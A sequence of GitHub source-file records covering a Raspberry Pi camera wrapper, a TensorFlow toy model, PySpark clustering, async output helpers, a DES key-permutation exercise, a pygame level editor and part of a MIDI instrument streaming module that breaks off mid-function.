plugin to finish installing\n sleep(40)\n\n\nif __name__ == '__main__':\n pytest.main(['testTeacherLogin.py'])\n\n\n","repo_name":"weilutao/pc_autotest","sub_path":"testcase/pywinauto/teacher/testTeacherLogin.py","file_name":"testTeacherLogin.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40849432686","text":"import io\nimport os\nimport logging\nfrom threading import Condition\nimport numpy as np\nimport picamera\n\nclass Camera(object):\n\n FFMPEG_CMD = 'ffmpeg'\n PHOTO_FILE_EXT = \".jpg\"\n VIDEO_FILE_EXT = \".mp4\"\n VIDEO_FILE_EXT_H264 = '.h264'\n\n class StreamingOutputMJPEG(object):\n def __init__(self):\n self.frame = None\n self.buffer = io.BytesIO()\n self.condition = Condition()\n\n def write(self, buf):\n if buf.startswith(b'\\xff\\xd8'):\n # New frame, copy the existing buffer's content and notify all\n # clients it's available\n self.buffer.truncate()\n with self.condition:\n self.frame = self.buffer.getvalue()\n self.condition.notify_all()\n self.buffer.seek(0)\n return self.buffer.write(buf)\n\n class StreamingOutputBGR(object):\n def __init__(self, resolution):\n self.frame = None\n self.condition = Condition()\n self.resolution = resolution\n self.count = 0\n\n def write(self, buf):\n with self.condition:\n frame = np.frombuffer(buf, dtype=np.uint8)\n self.frame = frame.reshape(self.resolution[1], self.resolution[0], 4)\n self.frame = np.delete(self.frame, 3, 2)\n self.condition.notify_all()\n return len(buf)\n\n def __init__(self, props):\n logging.info(\"camera init\")\n self.camera = picamera.PiCamera()\n self.camera.resolution = (props.get('width', 640), props.get('height', 512))\n self.out_rgb_resolution = (int(self.camera.resolution[0] / int(props.get('cv_image_factor', 4))), int(self.camera.resolution[1] / int(props.get('cv_image_factor', 4))))\n self.camera.framerate = float(props.get('framerate', 20))\n self.camera.exposure_mode = props.get('exposure_mode', \"auto\")\n self.output_mjpeg = self.StreamingOutputMJPEG()\n self.output_bgr = self.StreamingOutputBGR(self.out_rgb_resolution)\n self.h264_encoder = None\n self.recording = None\n self.video_filename = None\n self._jpeg_quality = props.get('jpeg_quality', 20)\n
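 # Note (added for orientation): the camera's three splitter ports are\n # used as 0 = MJPEG preview stream, 1 = BGR frames for CV processing,\n # 2 = H.264 recording; see grab_start() and video_rec() below.\n 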
self._jpeg_bitrate = props.get('jpeg_bitrate', 5000000)\n\n def video_rec(self, filename):\n self.video_filename = filename[:filename.rfind(\".\")]\n self.camera.start_recording(self.video_filename + self.VIDEO_FILE_EXT_H264, format=\"h264\", quality=23, splitter_port=2)\n\n def video_stop(self):\n logging.debug(\"video_stop\")\n self.camera.stop_recording(2)\n\n # pack in mp4 container\n params = \" -loglevel quiet -stats -framerate \" + str(self.camera.framerate) + \\\n \" -i \" + self.video_filename + self.VIDEO_FILE_EXT_H264 + \\\n \" -c copy \" + self.video_filename + self.VIDEO_FILE_EXT\n\n os.system(self.FFMPEG_CMD + params)\n # remove h264 file\n os.remove(self.video_filename + self.VIDEO_FILE_EXT_H264)\n\n def grab_start(self):\n logging.debug(\"grab_start\")\n self.camera.start_recording(self.output_mjpeg, format=\"mjpeg\", splitter_port=0, bitrate=self._jpeg_bitrate)\n self.camera.start_recording(self.output_bgr, format=\"bgra\", splitter_port=1, resize=self.out_rgb_resolution)\n\n def grab_stop(self):\n logging.debug(\"grab_stop\")\n\n self.camera.stop_recording(0)\n self.camera.stop_recording(1)\n\n def get_image_jpeg(self):\n with self.output_mjpeg.condition:\n self.output_mjpeg.condition.wait()\n return self.output_mjpeg.frame\n\n def get_image_bgr(self):\n with self.output_bgr.condition:\n self.output_bgr.condition.wait()\n return self.output_bgr.frame\n\n def set_overlay_text(self, text):\n try:\n self.camera.annotate_text = text\n except picamera.PiCameraValueError:\n logging.info(\"PiCameraValueError\")\n\n def close(self):\n self.camera.close()\n","repo_name":"CoderBotOrg/backend","sub_path":"coderbot/cv/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"72"} +{"seq_id":"72437525034","text":"\nimport tensorflow as tf\n#from keras.models import load_model \n#import keras\n#mnist = tf.keras.datasets.mnist\nimport matplotlib.pyplot as plt\n\nimport numpy as np\n\n\n\ndef Deep_neural_net(Z1,Z2):\n model = tf.keras.models.Sequential([tf.keras.layers.Flatten()])\n #model =tf.keras.layers.Flatten()\n model.add(tf.keras.layers.Dense(1000,kernel_initializer='uniform',activation=tf.nn.relu))\n model.add(tf.keras.layers.Dense(1000,kernel_initializer='uniform',activation=tf.nn.relu))\n model.add(tf.keras.layers.Dense(1000,kernel_initializer='uniform',activation=tf.nn.relu))\n model.add(tf.keras.layers.Dense(1000,kernel_initializer='uniform',activation=tf.nn.relu))\n \n model.add(tf.keras.layers.Dense(1,activation=tf.nn.sigmoid))\n \n '''\n model.add(tf.keras.layers.Embedding(10,1))\n model.add(tf.keras.layers.LSTM(128,dropout=0.2,recurrent_dropout=0.2))\n model.add(tf.keras.layers.Dense(1, activation=tf.nn.sigmoid))\n '''\n \n \n \n '''\n model = tf.keras.models.Sequential([\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(1000, activation=tf.nn.relu),\n tf.keras.layers.Dense(1000, activation=tf.nn.relu),\n tf.keras.layers.Dense(1000, activation=tf.nn.relu),\n tf.keras.layers.Dense(1000, activation=tf.nn.relu),\n \n #tf.keras.layers.Dense(10, activation=tf.nn.relu),\n #tf.keras.layers.Dense(100, activation=tf.nn.relu),\n \n \n tf.keras.layers.Dense(1, activation=tf.nn.sigmoid)\n ])\n \n '''\n model.compile(optimizer='adamax',\n loss='binary_crossentropy',\n metrics=['mae'])\n\n '''\n model.compile(optimizer='adamax',\n loss='mse',\n metrics=['mae'])\n '''\n\n\n model.fit(Z1, Z2, epochs=200)\n #tf.keras.models.save('Neural_Network.h5')\n \n\n return 
model\n\n\n\n\n\n\n\n\nZ1=np.random.rand(50,10,2)\nZ2=np.zeros((50,1))\n\nprint(Z1)\n#Z2=np.sum(np.all(Z1)**2)\n\n#'''\nprint(np.shape(Z1))\n#print(Z1)\nfor i in range(len(Z2)):\n Z2[i]=0\n for j in range(len(Z1[i])):\n Z2[i]+=((Z1[i][j][0]**2+Z1[i][j][1]**2)**0.5)/10\n \n#'''\n\n\n#plt.scatter(Z1,Z2,s=5)\n#plt.show()\n\n\nmodel=Deep_neural_net(Z1,Z2)\n\nZ1=np.random.rand(20,10,2)\nZ2=np.zeros((20,1))\n\n#Z2=np.sum(np.all(Z1)**2)\n\n#'''\nprint(np.shape(Z1))\n#print(Z1)\nfor i in range(len(Z2)):\n Z2[i]=0\n for j in range(len(Z1[i])):\n Z2[i]+=((Z1[i][j][0]**2+Z1[i][j][1]**2)**0.5)/10\n#'''\n\n#model.load_model('Neural_Network.h5')\n\nAnswer=model.predict(Z1)\n\nscore=model.evaluate(Z1,Z2)\n\nplt.plot(Z2)\nplt.plot(Answer)\nprint(score)\n#plt.scatter(Z1,Answer,s=10)\n#plt.scatter(Z1,Z2,s=5)\n\nplt.show()\n\n#print(model.evaulate())\n\n\n#model.output_shape\n#model.get_weights()\n#model.save('models.h5')","repo_name":"joejoseph007/2018_10_18","sub_path":"1./test9.py","file_name":"test9.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16000051967","text":"from pyspark.ml.clustering import KMeans, BisectingKMeans\n\n\nclass Clustering:\n df = None\n\n def __init__(self, df):\n self.df = df\n\n def k_means(self, k):\n print('\\nK-Means - ' + str(k))\n kmeans = KMeans().setK(k).setSeed(1)\n model = kmeans.fit(self.df.select('features'))\n\n transformed = model.transform(self.df)\n transformed.groupBy(\"prediction\").count().show()\n\n centers = model.clusterCenters()\n self.print_centers(centers)\n\n def bisecting_k_means(self, k):\n print('\\nBisecting K-Means - ' + str(k))\n kmeans = BisectingKMeans().setK(k).setSeed(1)\n model = kmeans.fit(self.df.select('features'))\n\n transformed = model.transform(self.df)\n transformed.groupBy(\"prediction\").count().show()\n\n centers = model.clusterCenters()\n self.print_centers(centers)\n\n def print_centers(self, centers):\n for center in centers:\n print(center)\n \n\n","repo_name":"pawelciupka/STUDIA-BigData","sub_path":"Project/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29813075449","text":"\"\"\"\nFound usages are returned from all core search functions as async generators\nwhich the methods in this module can consume and loop through to output in\ndifferent formats.\n\"\"\"\n\nimport json\n\nfrom aiostream import stream\n\nseparators_with_no_spaces_to_match_jq_compact_format = (\",\", \":\")\n\n\ndef as_json_line(usage):\n return json.dumps(\n usage, separators=separators_with_no_spaces_to_match_jq_compact_format\n )\n\n\nasync def output_to_stdout(all_usages):\n async for usage in all_usages:\n print(as_json_line(usage))\n\n\nasync def output_to_file(all_usages, output_file):\n from aiofile import async_open\n\n async with async_open(output_file, \"w\") as file:\n async for usage in all_usages:\n await file.write(f\"{as_json_line(usage)}\\n\")\n\n\nasync def output_to_sqlite(all_usages, database, table, batch_size):\n \"\"\"\n If you need more flexibility you can output to stdout or file and pipe\n that into the sqlite-utils cli directly instead.\n \"\"\"\n from sqlite_utils import Database\n\n db = Database(database, recreate=False)\n\n chunked_usages = stream.chunks(all_usages, batch_size)\n async with chunked_usages.stream() as usages_stream:\n async for usages in usages_stream:\n 
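# Each chunk from aiostream is a list of up to batch_size usage dicts;\n            # insert_all writes the whole chunk to the table in one bulk call.\n            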
db[table].insert_all(usages, batch_size=batch_size)\n","repo_name":"hmrc/play-frontend-find-usages","sub_path":"find_usages/outputs.py","file_name":"outputs.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22129246646","text":"\"\"\"\nFirst tryyy\n\nApproach, use a list def dict and create a frequency array, maintaining the key for the max\n\n\"\"\"\n\ndef solution(inputArray):\n if len(inputArray) == 1: return inputArray\n \n import collections\n freqlist = collections.defaultdict(list)\n maxlen = 0\n \n for s in inputArray:\n freqlist[len(s)].append(s)\n if len(s) > maxlen: maxlen = len(s)\n \n return freqlist[maxlen]\n","repo_name":"ShockleyJE/codesignal","sub_path":"Intro/level3/allLongestStrings.py","file_name":"allLongestStrings.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41816248275","text":"from to_binary import convert_to_binary\r\nfrom random_key import create_random_key\r\n\r\n\r\ndef convert_to_kplus(key_binary):\r\n key_plus = ''\r\n\r\n global pc1\r\n pc1 = [\r\n 57, 49, 41, 33, 25, 17, 9, 1,\r\n 58, 50, 42, 34, 26, 18, 10, 2,\r\n 59, 51, 43, 35, 27, 19, 11, 3,\r\n 60, 52, 44, 36, 63, 55, 47, 39,\r\n 31, 23, 15, 7, 62, 54, 46, 38,\r\n 30, 22, 14, 6, 61, 53, 45, 37,\r\n 29, 21, 13, 5, 28, 20, 12, 4\r\n ]\r\n\r\n for value in pc1:\r\n key_plus += key_binary[value]\r\n\r\n return key_plus\r\n\r\n\r\ndef retrieve_key():\r\n while True:\r\n choice = input(\"Enter (e) for entering a key, or (r) to randomly generate one: \")\r\n if choice == \"e\":\r\n key = input(\"Enter your 8-symbols key: \")\r\n if len(key) == 8: \r\n break\r\n else:\r\n print(\"Invalid key - 8 symbols required.\\n\")\r\n\r\n elif choice == \"r\":\r\n key = create_random_key(8)\r\n break\r\n\r\n else:\r\n print(\"No such option available\\n\")\r\n\r\n return key\r\n\r\n\r\ndef print_steps(key, key_binary, key_plus):\r\n print(f\"\\nOriginal Key: {key} Length: {len(key)}\")\r\n print(f\"Binary Key: {key_binary} Length: {len(key_binary)}\")\r\n print(f\"K+: {key_plus} Length: {len(key_plus)}\")\r\n\r\n print(\"\\nPC-1 Permutation Table:\")\r\n for i in range(0, len(pc1), 8):\r\n row = pc1[i:i + 8]\r\n for bit in row:\r\n print(f\"{bit:2}\", end=\" \")\r\n print()\r\n print()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"\\nLab 4 - Given the key of the DES algorithm (8 symbols), determine K+.\\n\")\r\n key = retrieve_key()\r\n key_binary = convert_to_binary(key) \r\n key_plus = convert_to_kplus(key_binary)\r\n print_steps(key, key_binary, key_plus)\r\n","repo_name":"zly-VON/CS---Labs","sub_path":"Lab#4 - DES Algorithm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31901900975","text":"import csv\nfrom os import getcwd, path\n\nimport pygame\n\nfrom button import Button\n\n\npygame.init()\n\nclock = pygame.time.Clock()\nFPS = 60\n\n# game window\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 640\nLOWER_MARGIN = 100\nSIDE_MARGIN = 400\n\nscreen = pygame.display.set_mode((SCREEN_WIDTH + SIDE_MARGIN, SCREEN_HEIGHT + LOWER_MARGIN))\npygame.display.set_caption('Level Editor')\n\n# define game variables\nROWS = 150\nTILE_SIZE = 40\nLOWER_TILE_TYPES = 67\nDECOR_TILE_TYPES = 11\nUPPER_TILE_TYPES = 6\nCOLS = 150\ncurrent_tile = 0\nlevel = 1\nlayer = 'lower'\ncurrent_layer_btn = 
0\nscroll_left = False\nscroll_right = False\nscroll_up = False\nscroll_down = False\nscroll = [0, 0]\nscroll_speed = 1\n\n# define filepaths\nres_dir = path.join(path.dirname(__file__))\nimg_dir = path.join(res_dir, 'img')\nlvl_dir = path.join(getcwd(), 'levels')\nlower_tile_dir = path.join(img_dir, 'tile', 'lower')\ndecor_tile_dir = path.join(img_dir, 'tile', 'decor')\nupper_tile_dir = path.join(img_dir, 'tile', 'upper')\n\n# load layers button images\nlower_btn_img = pygame.image.load(path.join(img_dir, 'lower-btn.png')).convert_alpha()\ndecor_btn_img = pygame.image.load(path.join(img_dir, 'decor-btn.png')).convert_alpha()\nupper_btn_img = pygame.image.load(path.join(img_dir, 'upper-btn.png')).convert_alpha()\n\n# define empty tile lists\nlower_img_list = []\ndecor_img_list = []\nupper_img_list = []\n\n# store lower tiles in a list\nfor x in range(LOWER_TILE_TYPES):\n img = pygame.image.load(path.join(lower_tile_dir, f'{x}.png')).convert_alpha()\n img = pygame.transform.scale(img, (TILE_SIZE, TILE_SIZE))\n lower_img_list.append(img)\n\n# store decor tiles in a list\nfor x in range(DECOR_TILE_TYPES):\n img = pygame.image.load(path.join(decor_tile_dir, f'{x}.png')).convert_alpha()\n img = pygame.transform.scale(img, (TILE_SIZE, TILE_SIZE))\n decor_img_list.append(img)\n\n# store upper tiles in a list\nfor x in range(UPPER_TILE_TYPES):\n img = pygame.image.load(path.join(upper_tile_dir, f'{x}.png')).convert_alpha()\n img = pygame.transform.scale(img, (TILE_SIZE, TILE_SIZE))\n upper_img_list.append(img)\n\nsave_img = pygame.image.load(path.join(img_dir, 'save_btn.png')).convert_alpha()\nload_img = pygame.image.load(path.join(img_dir, 'load_btn.png')).convert_alpha()\n\n# define colours\nBG = (35, 35, 35)\nGREEN = (144, 201, 120)\nWHITE = (255, 255, 255)\nRED = (200, 25, 25)\n\n# define font\nfont = pygame.font.SysFont('Futura', 30)\n\n# create empty tile lists\nlower_world_data = []\ndecor_world_data = []\nupper_world_data = []\n\n# lower world layer\nfor row in range(ROWS):\n r = [-1] * COLS\n lower_world_data.append(r)\n\n# decor world layer\nfor row in range(ROWS):\n r = [-1] * COLS\n decor_world_data.append(r)\n\n# upper world layer\nfor row in range(ROWS):\n r = [-1] * COLS\n upper_world_data.append(r)\n\n\n# function for outputting text onto the screen\ndef draw_text(text, font, text_col, x, y):\n img = font.render(text, True, text_col)\n screen.blit(img, (x, y))\n\n\n# function for drawing background\ndef draw_bg():\n screen.fill(BG)\n\n\n# draw grid\ndef draw_grid():\n # vertical lines\n for c in range(COLS + 1):\n pygame.draw.line(screen, WHITE, (c * TILE_SIZE - scroll[0], 0), (c * TILE_SIZE - scroll[0], SCREEN_HEIGHT))\n # horizontal lines\n for c in range(ROWS + 1):\n pygame.draw.line(screen, WHITE, (0, c * TILE_SIZE - scroll[1]), (SCREEN_WIDTH, c * TILE_SIZE - scroll[1]))\n\n\n# function for drawing the world tiles\ndef draw_world():\n # lower\n for y, row in enumerate(lower_world_data):\n for x, tile in enumerate(row):\n if tile >= 0:\n screen.blit(lower_img_list[tile], (x * TILE_SIZE - scroll[0], y * TILE_SIZE - scroll[1]))\n\n # decor\n for y, row in enumerate(decor_world_data):\n for x, tile in enumerate(row):\n if tile >= 0:\n screen.blit(decor_img_list[tile], (x * TILE_SIZE - scroll[0], y * TILE_SIZE - scroll[1]))\n\n # upper\n for y, row in enumerate(upper_world_data):\n for x, tile in enumerate(row):\n if tile >= 0:\n screen.blit(upper_img_list[tile], (x * TILE_SIZE - scroll[0], y * TILE_SIZE - scroll[1]))\n\n\n# create buttons\nsave_button = Button(SCREEN_WIDTH // 2, 
SCREEN_HEIGHT + LOWER_MARGIN - 50, save_img, 1)\nload_button = Button(SCREEN_WIDTH // 2 + 200, SCREEN_HEIGHT + LOWER_MARGIN - 50, load_img, 1)\n\n# make a button list\n# layer buttons\nlower_btn = Button(SCREEN_WIDTH + 10, 5, lower_btn_img, 1)\ndecor_btn = Button(SCREEN_WIDTH + 140, 5, decor_btn_img, 1)\nupper_btn = Button(SCREEN_WIDTH + 260, 5, upper_btn_img, 1)\nlayers_btn_list = [lower_btn, decor_btn, upper_btn]\n\n# lower tile buttons\nlower_button_list = []\nbutton_col = 0\nbutton_row = 0\nfor i in range(len(lower_img_list)):\n tile_button = Button(SCREEN_WIDTH + (50 * button_col) + 25, 50 * button_row + 50, lower_img_list[i], 1)\n lower_button_list.append(tile_button)\n button_col += 1\n if button_col == 7:\n button_col = 0\n button_row += 1\n\n# upper tile buttons\ndecor_button_list = []\nbutton_col = 0\nbutton_row = 0\nfor i in range(len(decor_img_list)):\n tile_button = Button(SCREEN_WIDTH + (50 * button_col) + 25, 50 * button_row + 50, decor_img_list[i], 1)\n decor_button_list.append(tile_button)\n button_col += 1\n if button_col == 7:\n button_col = 0\n button_row += 1\n\n# decor tile buttons\nupper_button_list = []\nbutton_col = 0\nbutton_row = 0\nfor i in range(len(upper_img_list)):\n tile_button = Button(SCREEN_WIDTH + (50 * button_col) + 25, 50 * button_row + 50, upper_img_list[i], 1)\n upper_button_list.append(tile_button)\n button_col += 1\n if button_col == 7:\n button_col = 0\n button_row += 1\n\nrun = True\nwhile run:\n\n clock.tick(FPS)\n\n draw_bg()\n draw_grid()\n draw_world()\n\n # draw bottom panel\n pygame.draw.rect(screen, BG, (0, SCREEN_HEIGHT, SCREEN_WIDTH + SIDE_MARGIN, SCREEN_HEIGHT + LOWER_MARGIN))\n\n draw_text(f'Level: {level}', font, WHITE, 10, SCREEN_HEIGHT + LOWER_MARGIN - 90)\n draw_text('Press UP or DOWN to change level', font, WHITE, 10, SCREEN_HEIGHT + LOWER_MARGIN - 60)\n if path.exists(path.join(lvl_dir, f'level{level}_lower_data.csv')):\n draw_text('File already exists, be careful when saving!', font, RED, 400, SCREEN_HEIGHT + LOWER_MARGIN - 80)\n\n # save and load data\n if save_button.draw(screen):\n # save level data\n # lower\n with open(path.join(lvl_dir, f'level{level}_lower_data.csv'), 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n for row in lower_world_data:\n writer.writerow(row)\n\n # decor\n with open(path.join(lvl_dir, f'level{level}_decor_data.csv'), 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n for row in decor_world_data:\n writer.writerow(row)\n\n # upper\n with open(path.join(lvl_dir, f'level{level}_upper_data.csv'), 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n for row in upper_world_data:\n writer.writerow(row)\n\n if load_button.draw(screen):\n # load in level data\n # reset scroll back to the start of the level\n scroll = [0, 0]\n save_trigger = 0\n\n # lower layer\n if path.exists(path.join(lvl_dir, f'level{level}_lower_data.csv')):\n with open(path.join(lvl_dir, f'level{level}_lower_data.csv'), newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for x, row in enumerate(reader):\n for y, tile in enumerate(row):\n lower_world_data[x][y] = int(tile)\n else:\n print(f\"File 'level{level}_lower_data.csv' Doesn't Exist\")\n\n # decor layer\n if path.exists(path.join(lvl_dir, f'level{level}_decor_data.csv')):\n with open(path.join(lvl_dir, f'level{level}_decor_data.csv'), newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for x, row in enumerate(reader):\n for y, tile in enumerate(row):\n 
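# csv.reader yields strings, so int() casts the cells back to tile ids\n                        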
decor_world_data[x][y] = int(tile)\n else:\n print(f\"File 'level{level}_decor_data.csv' Doesn't Exist\")\n\n # lower layer\n if path.exists(path.join(lvl_dir, f'level{level}_upper_data.csv')):\n with open(path.join(lvl_dir, f'level{level}_upper_data.csv'), newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for x, row in enumerate(reader):\n for y, tile in enumerate(row):\n upper_world_data[x][y] = int(tile)\n else:\n print(f\"File 'level{level}_upper_data.csv' Doesn't Exist\")\n\n # draw tile panel and tiles\n pygame.draw.rect(screen, GREEN, (SCREEN_WIDTH, 0, SIDE_MARGIN, SCREEN_HEIGHT))\n\n # choose a layer button\n if lower_btn.draw(screen):\n current_layer_btn = 0\n layer = 'lower'\n current_tile = 0\n elif decor_btn.draw(screen):\n current_layer_btn = 1\n layer = 'decor'\n current_tile = 0\n elif upper_btn.draw(screen):\n current_layer_btn = 2\n layer = 'upper'\n current_tile = 0\n\n # highlight the selected layer button\n pygame.draw.rect(screen, RED, layers_btn_list[current_layer_btn].rect, 3)\n\n # choose a tile from layer tiles\n # lower layer tiles\n if layer == 'lower':\n button_count = 0\n for button_count, i in enumerate(lower_button_list):\n if i.draw(screen):\n current_tile = button_count\n\n # highlight the selected tile\n pygame.draw.rect(screen, RED, lower_button_list[current_tile].rect, 3)\n\n # decor layer tiles\n elif layer == 'decor':\n button_count = 0\n for button_count, i in enumerate(decor_button_list):\n if i.draw(screen):\n current_tile = button_count\n\n # highlight the selected tile\n pygame.draw.rect(screen, RED, decor_button_list[current_tile].rect, 3)\n\n # decor layer tiles\n elif layer == 'upper':\n button_count = 0\n for button_count, i in enumerate(upper_button_list):\n if i.draw(screen):\n current_tile = button_count\n\n # highlight the selected tile\n pygame.draw.rect(screen, RED, upper_button_list[current_tile].rect, 3)\n\n # scroll the map\n if scroll_left and scroll[0] > 0:\n scroll[0] -= 5 * scroll_speed\n if scroll[0] < 0:\n scroll[0] = 0\n if scroll_right and scroll[0] < (COLS * TILE_SIZE) - SCREEN_WIDTH:\n scroll[0] += 5 * scroll_speed\n if scroll[0] > (COLS * TILE_SIZE) - SCREEN_WIDTH:\n scroll[0] = (COLS * TILE_SIZE) - SCREEN_WIDTH\n if scroll_up and scroll[1] > 0:\n scroll[1] -= 5 * scroll_speed\n if scroll[1] < 0:\n scroll[1] = 0\n if scroll_down and scroll[1] < (ROWS * TILE_SIZE) - SCREEN_HEIGHT:\n scroll[1] += 5 * scroll_speed\n if scroll[1] > (ROWS * TILE_SIZE) - SCREEN_HEIGHT:\n scroll[1] = (ROWS * TILE_SIZE) - SCREEN_HEIGHT\n\n # add new tiles to the screen\n # get mouse position\n pos = pygame.mouse.get_pos()\n x = (pos[0] + scroll[0]) // TILE_SIZE\n y = (pos[1] + scroll[1]) // TILE_SIZE\n\n # check that the coordinates are within the tile area\n if pos[0] < SCREEN_WIDTH and pos[1] < SCREEN_HEIGHT:\n # update tile value\n if layer == 'lower':\n if pygame.mouse.get_pressed()[0] == 1:\n if lower_world_data[y][x] != current_tile:\n lower_world_data[y][x] = current_tile\n if pygame.mouse.get_pressed()[2] == 1:\n lower_world_data[y][x] = -1\n elif layer == 'decor':\n if pygame.mouse.get_pressed()[0] == 1:\n if decor_world_data[y][x] != current_tile:\n decor_world_data[y][x] = current_tile\n if pygame.mouse.get_pressed()[2] == 1:\n decor_world_data[y][x] = -1\n elif layer == 'upper':\n if pygame.mouse.get_pressed()[0] == 1:\n if upper_world_data[y][x] != current_tile:\n upper_world_data[y][x] = current_tile\n if pygame.mouse.get_pressed()[2] == 1:\n upper_world_data[y][x] = -1\n\n # event handler\n for event in 
pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n # keyboard presses\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n level += 1\n save_trigger = 0\n if event.key == pygame.K_DOWN and level > 1:\n level -= 1\n save_trigger = 0\n if event.key == pygame.K_a:\n scroll_left = True\n if event.key == pygame.K_d:\n scroll_right = True\n if event.key == pygame.K_w:\n scroll_up = True\n if event.key == pygame.K_s:\n scroll_down = True\n if event.key == pygame.K_LSHIFT:\n scroll_speed = 5\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_a:\n scroll_left = False\n if event.key == pygame.K_d:\n scroll_right = False\n if event.key == pygame.K_w:\n scroll_up = False\n if event.key == pygame.K_s:\n scroll_down = False\n if event.key == pygame.K_LSHIFT:\n scroll_speed = 1\n\n pygame.display.update()\n\npygame.quit()\n","repo_name":"Araime/dungeon-wars-editor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74266288874","text":"\"\"\"Support for event streams, messages, instruments, MIDI devices, and MIDI files.\n\nThis module includes functions for working with MIDI devices and files,\nbut it also describes a basic interface for _events_ and _instruments_\nwhich is useful even if you don't care about MIDI itself.\n\nAn event consists of some data; for example, a typical MIDI message like `Message(type='note_on', note=60, velocity=100)`.\nThe important thing is that events do not include timing information. Instead, the timing is inherent in the event stream.\nEvent streams consist of tuples of events. The timestamp of an event is given by its position in the stream.\nAt any point in the stream, multiple events may occur simultaneously (tuple of length > 1), or no events may occur (empty tuple).\n\nBecause event streams yield tuples, they may be composed in parallel by addition:\n`event_stream_a + event_stream_b` creates a combined event stream with all the events from both.\n\nAn _instrument_ is any function that takes an event stream and returns a sample stream.\n\nExample usage:\nplay(midi.poly_instrument(midi.input_stream()))\n\"\"\"\nimport mido\n\nfrom aleatora.streams.core import FunctionStream\n\nfrom .streams import const, events_in_time, frame, m2f, osc, ramp, repeat, SAMPLE_RATE, stream\n\nget_input_names = mido.get_input_names\n\n# This is used interchangeably with mido.Message, which (true to MIDI) doesn't allow float values.\n# (Would use a namedtuple, but they lack `defaults` in the version of PyPy I'm using.)\nclass Message:\n def __init__(self, type, note, velocity=None):\n self.type = type\n self.note = note\n self.velocity = velocity\n \n def __repr__(self):\n return f\"Message({self.type}, {self.note}, {self.velocity})\"\n\ndef input_stream(port=None):\n if port is None:\n port = get_input_names()[-1]\n if isinstance(port, str):\n port = mido.open_input(port)\n return repeat(lambda: tuple(port.iter_pending()))\n\n@stream\ndef load(filename, include_meta=False):\n simultaneous = []\n delta = 0\n for message in mido.MidiFile(filename):\n delta += message.time * SAMPLE_RATE\n if int(delta) > 0:\n yield tuple(simultaneous)\n delta -= 1\n yield from const(())[:int(delta)]\n delta -= int(delta)\n simultaneous = []\n if not message.is_meta or include_meta:\n simultaneous.append(message)\n\ndef save(stream, filename, rate=None, bpm=120):\n if rate is None:\n rate = SAMPLE_RATE\n
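 # Timing note (added): each stream step is one sample, i.e. 1/rate\n # seconds, so `t` below advances by 1/rate * (bpm / 60) * ticks_per_beat\n # MIDI ticks per sample; int(t) becomes the message delta and the\n # fractional remainder carries over to the next message.\n mid = 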
mido.MidiFile()\n track = mido.MidiTrack()\n mid.tracks.append(track)\n t = 0\n for messages in stream:\n for message in messages:\n if not isinstance(message, mido.Message):\n message = mido.Message(message.type, note=int(message.note), velocity=int(message.velocity or 0))\n message.time = int(t)\n t -= int(t)\n track.append(message)\n t += 1/rate * (bpm / 60) * mid.ticks_per_beat\n mid.save(filename)\n\n# Instruments take a stream of tuples of MIDI-style messages\n# (objects with `type`, `note`, `velocity`) and produce a stream of samples.\n# Instruments may persist (continue streaming even when they are only producing silence) or not.\n# Persisting is useful for playing an instrument for a live or indeterminate source,\n# while not persisting is useful for sequencing, or building up instruments\n# (as in converting a monophonic instrument to polyphonic).\n\n# Simple mono instrument. Acknowledges velocity, retriggers.\n@stream\ndef mono_instrument(stream, freq=0, amp=0, velocity=0, waveform=osc):\n freq_stream = repeat(lambda: freq)\n waveform_iter = iter(waveform(freq_stream))\n for events in stream:\n if not events:\n pass\n elif events[-1].type == 'note_on':\n freq = m2f(events[-1].note)\n velocity = events[-1].velocity\n elif events[-1].type == 'note_off':\n velocity = 0\n target_amp = velocity / 127\n if amp > target_amp:\n amp = max(target_amp, amp - 1e-4)\n else:\n amp = min(target_amp, amp + 1e-6 * velocity**2)\n yield amp * next(waveform_iter)\n while amp > 0:\n if amp > target_amp:\n amp = max(target_amp, amp - 1e-4)\n else:\n amp = min(target_amp, amp + 1e-6 * velocity**2)\n yield amp * next(waveform_iter)\n\n# Convert a monophonic instrument into a polyphonic instrument.\ndef make_poly(monophonic_instrument, persist_internal=False):\n # Provides a 'substream' of messages for a single voice in a polyphonic instrument.\n def make_event_substream():\n @FunctionStream\n def substream():\n while substream.last_event is None:\n yield substream.events\n yield (substream.last_event,)\n substream.events = ()\n substream.last_event = None\n return substream\n\n @stream\n def polyphonic_instrument(stream, **kwargs):\n substreams = {}\n voices = []\n for events in stream:\n acc = 0\n # Clear old messages:\n for substream in substreams.values():\n substream.events = ()\n for event in events:\n if event.type == 'note_on':\n if event.note in substreams:\n # Retrigger existing voice\n 